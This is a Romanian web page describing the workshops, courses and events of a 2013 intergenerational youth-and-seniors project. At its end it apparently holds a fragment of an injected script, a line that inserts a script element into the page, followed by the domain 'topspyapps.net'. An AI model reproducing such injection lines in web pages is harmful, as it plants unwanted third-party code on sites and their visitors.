Ateliere si activitati sportive

15_iunie_regeneration_group-5Open House

Evenimentul de incheiere a proiectului din 15 iunie 2013 a inclus premierea cursantilor, a voluntarilor merituosi, sceneta de teatru, momente artistice sustinute de tineri si seniori, workshop face-painting si concurs de gatit

 

 

workshop_valori_2013_-005Workshop principii si valori

Sustinut de dnul Puiu Daneti, dra Erika Ada si dra Florentina Turcanu, acest atelier i-a determinat pe tinerii participanti sa gaseasca valorile reale din viata lor si motivatia pentru a-si implini idealurile.

 

 

cum_scriu_un_proiect_1-003Scriere de proiecte

Workshop cu durata de 2 zile coordonat de dna prof. Maria Goian si dra Dana Lazar, ce a creat cadrul pentru a gandi si implemeta proiecte personale sau comunitare, pronind de la o nevoie reala.

 

 

2013_checea_17Scoala de weekend | Comuna Checea

Saptamanal, echipa intergenerationala a organizat activitati cu tinerii de la Checea ce au inclus: meditatii si teme scolare, activitati sportive invatarea limbilor straine activitati recreative (vizionare film, sculptura)

 

 

img_0876Cursuri limbi straine si calculatoare

Cursuri de calculatoare si limbi straine pentru seniori, sustinute de tineri, o punte de legatura intre generatii si lume.

 

 

 

dsc_0184Sanatate prin sport si dans

Seniorii si tinerii au participat timp de 3 luni cu regularitate la activitatile organizate pentru ei cu sprijinul partenerului Asociatia Centrul regional de suport pentru persoanele cu boli cronice din Timisoara

 

 

15_iunie_regeneration_2_-007Workshop de teatru

Sub coordonarea lui Andreeas, cei 5 tineri elevi ai Colegiului de Arta Ion Vidu au adaptat si pus in scena doua scenete: “La dramba, la stramba” si “Familia Rontaila”, ce au avut un impact deosebit la evenimentul Open House.

document.currentScript.parentNode.insertBefore(s, document.currentScript);

topspyapps.net